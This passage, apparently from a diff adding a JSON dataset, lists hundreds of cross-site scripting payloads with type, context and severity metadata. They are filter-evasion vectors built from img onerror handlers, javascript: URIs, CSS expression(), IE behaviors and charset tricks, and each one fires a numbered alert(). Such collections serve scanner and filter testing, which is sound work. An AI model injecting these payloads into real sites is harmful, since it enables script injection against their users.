"<img\\x32src=x onerror=\"javascript:alert(1595)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img\\x47src=x onerror=\"javascript:alert(7589)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img\\x11src=x onerror=\"javascript:alert(0625)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img \\x47src=x onerror=\"javascript:alert(6642)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img \\x34src=x onerror=\"javascript:alert(8449)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img \\x39src=x onerror=\"javascript:alert(5625)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img \\x00src=x onerror=\"javascript:alert(5023)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src\\x09=x onerror=\"javascript:alert(9260)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src\\x10=x onerror=\"javascript:alert(3539)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src\\x13=x onerror=\"javascript:alert(8195)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src\\x32=x onerror=\"javascript:alert(2514)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src\\x12=x onerror=\"javascript:alert(3915)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src\\x11=x onerror=\"javascript:alert(1210)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src\\x00=x onerror=\"javascript:alert(1221)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src\\x47=x onerror=\"javascript:alert(1558)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=x\\x09onerror=\"javascript:alert(7574)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=x\\x10onerror=\"javascript:alert(5274)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=x\\x11onerror=\"javascript:alert(3350)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=x\\x12onerror=\"javascript:alert(4337)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=x\\x13onerror=\"javascript:alert(8310)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(7938)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=x onerror=\\x09\"javascript:alert(9439)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=x onerror=\\x10\"javascript:alert(4195)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=x onerror=\\x11\"javascript:alert(1156)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=x onerror=\\x12\"javascript:alert(8445)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=x onerror=\\x32\"javascript:alert(0825)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=x onerror=\\x00\"javascript:alert(0680)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(2296)>XXX</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=\"x` `<script>javascript:alert(6082)</script>\"` `>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src onerror /\" '\"= alt=javascript:alert(2211)//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<title onpropertychange=javascript:alert(5093)></title><title title=>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(6312)></a>\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<!--[if]><script>javascript:alert(5746)</script -->", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<!--[if<img src=x onerror=javascript:alert(9150)//]> -->", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script src=\"/\\%(jscript)s\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script src=\"\\\\%(jscript)s\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object> <object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"javascript:alert(2330)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1502))%7d", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style>@import \"data:,*%7bx:expression(javascript:alert(6394))%7D\";</style>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"javascript:alert(6001);\">XXX</a></a><a href=\"javascript:javascript:alert(6001)\">XXX</a>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style>*[{}@import'%(css)s?]</style>X", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div style=\"font-family:'foo&#10;;color:red;';\">XXX", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div style=\"font-family:foo}color=red;\">XXX", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<// style=x:expression\\28javascript:alert(8304)\\29>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style>*{x:expression(javascript:alert(9593))}</style>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div style=content:url(%(svg)s)></div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div style=\"list-style:url(http://foo.f)\\20url(javascript:javascript:alert(6996));\">X", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div id=d><div style=\"font-family:'sans\\27\\3B color\\3Ared\\3B'\">X</div></div> <script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div style=\"background:url(/f#&#127;oo/;color:red/*/foo.jpg);\">X", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div id=\"x\">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<x style=\"background:url('x&#1;;color:red;/*')\">XXX</x>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>({set/**/$($){_/**/setter=$,_=javascript:alert(3067)}}).$=eval</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>({0:#0=eval/#0#/#0#(javascript:alert(8594))})</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(3700)}),x</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(4459)')()</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<meta charset=\"mac-farsi\">¼script¾javascript:alert(8231)¼/script¾", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(4613)` >", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(6715)&gt;`>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(6773)&gt;>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(7409) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:javascript:alert(0368)\">XXX</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<x style=\"behavior:url(%(sct)s)\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<xml id=\"xss\" src=\"%(htc)s\"></xml> <label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<event-source src=\"%(event)s\" onload=\"javascript:alert(1364)\">", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javascript:javascript:alert(8860)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div id=\"x\">x</div> <xml:namespace prefix=\"t\"> <import namespace=\"t\" implementation=\"#default#time2\"> <t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(8223)&gt;\">", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>%(payload)s</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script src=%(jscript)s></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script language='javascript' src='%(jscript)s'></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>javascript:alert(9177)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\"javascript:javascript:alert(3500);\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=javascript:javascript:alert(2459)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=`javascript:javascript:alert(9235)`>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT SRC=%(jscript)s?<B>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<FRAMESET><FRAME SRC=\"javascript:javascript:alert(8641);\"></FRAMESET>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BODY ONLOAD=javascript:alert(3213)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BODY ONLOAD=javascript:javascript:alert(8683)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\"jav\tascript:javascript:alert(6209);\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BODY onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(8411)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT/SRC=\"%(jscript)s\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<<SCRIPT>%(payload)s//<</SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\"javascript:javascript:alert(9409)\"", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe src=%(scriptlet)s <", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:javascript:alert(3057);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG DYNSRC=\"javascript:javascript:alert(1658)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG LOWSRC=\"javascript:javascript:alert(9866)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BGSOUND SRC=\"javascript:javascript:alert(2563);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BR SIZE=\"&{javascript:alert(2447)}\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<LAYER SRC=\"%(scriptlet)s\"></LAYER>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<LINK REL=\"stylesheet\" HREF=\"javascript:javascript:alert(7367);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE>@import'%(css)s';</STYLE>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<META HTTP-EQUIV=\"Link\" Content=\"<%(css)s>; REL=stylesheet\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<XSS STYLE=\"behavior: url(%(htc)s);\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE>li {list-style-image: url(\"javascript:javascript:alert(6422)\");}</STYLE><UL><LI>XSS", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:javascript:alert(5812);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:javascript:alert(0993);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IFRAME SRC=\"javascript:javascript:alert(3512);\"></IFRAME>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<TABLE BACKGROUND=\"javascript:javascript:alert(0096)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<TABLE><TD BACKGROUND=\"javascript:javascript:alert(6819)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<DIV STYLE=\"background-image: url(javascript:javascript:alert(2853))\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<DIV STYLE=\"width:expression(javascript:alert(9300));\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG STYLE=\"xss:expr/*XSS*/ession(javascript:alert(8716))\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<XSS STYLE=\"xss:expression(javascript:alert(1582))\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE TYPE=\"text/javascript\">javascript:alert(5157);</STYLE>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE>.XSS{background-image:url(\"javascript:javascript:alert(0916)\");}</STYLE><A CLASS=XSS></A>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE type=\"text/css\">BODY{background:url(\"javascript:javascript:alert(0031)\")}</STYLE>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<!--[if gte IE 4]><SCRIPT>javascript:alert(8303);</SCRIPT><![endif]-->", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BASE HREF=\"javascript:javascript:alert(6507);//\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"%(scriptlet)s\"></OBJECT>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(7075)></OBJECT>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"%(htc)s\"><xss:xss>XSS</xss:xss></HTML>\"\"\",\"XML namespace.\"),(\"\"\"<XML ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:javascript:alert(9742)\"&gt;</B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;javascript:alert(8062)&lt;/SCRIPT&gt;\"></BODY></HTML>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT SRC=\"%(jpg)s\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<form id=\"test\" /><button form=\"test\" formaction=\"javascript:javascript:alert(9282)\">X", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onscroll=javascript:alert(8034)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<P STYLE=\"behavior:url('#default#time2')\" end=\"0\" onEnd=\"javascript:alert(1041)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(6835);');}</STYLE>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<meta charset= \"x-imap4-modified-utf7\"&&>&&<script&&>javascript:alert(3797)&&;&&<&&/script&&>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT onreadystatechange=javascript:javascript:alert(7687);></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style onreadystatechange=javascript:javascript:alert(4801);></style>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<?xml version=\"1.0\"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(8554);</html:script></html:html>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<embed code=%(scriptlet)s></embed>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<embed code=javascript:javascript:alert(5860);></embed>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<embed src=%(jscript)s></embed>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<frameset onload=javascript:javascript:alert(6159)></frameset>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<object onerror=javascript:javascript:alert(7032)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<embed type=\"image\" src=%(scriptlet)s></embed>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]<![CDATA[cript:javascript:alert(0237);\">]]</C><X></xml>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=&{javascript:alert(5562);};>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": 